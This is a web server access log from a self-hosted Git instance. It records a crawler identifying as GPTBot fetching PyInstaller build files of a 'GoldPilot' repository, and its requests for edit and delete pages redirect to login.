"/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 894] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:18:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 53357] [Gzip 27.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:18:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 130628] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:18:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 27079] [Gzip 20.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:18:51:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:18:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:18:51:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:18:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:18:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:18:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 78610] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:18:51:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:18:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:18:51:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:18:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:18:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:18:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 31774] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:18:51:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:18:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:18:51:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:18:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:18:51:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:18:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:18:51:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:18:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:18:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:18:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 14487] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 9809] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:18:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 9809] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:18:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 9809] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:18:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 9803] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:18:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11129] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 59978] [Gzip 16.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:52:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:52:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 14386] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 8077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:52:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:18:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:18:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 80961] [Gzip 29.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:18:52:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:18:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:18:52:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:18:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:18:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:18:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 906] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:18:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:18:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 906] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:52:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:52:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9820] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:18:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 896] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:18:52:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 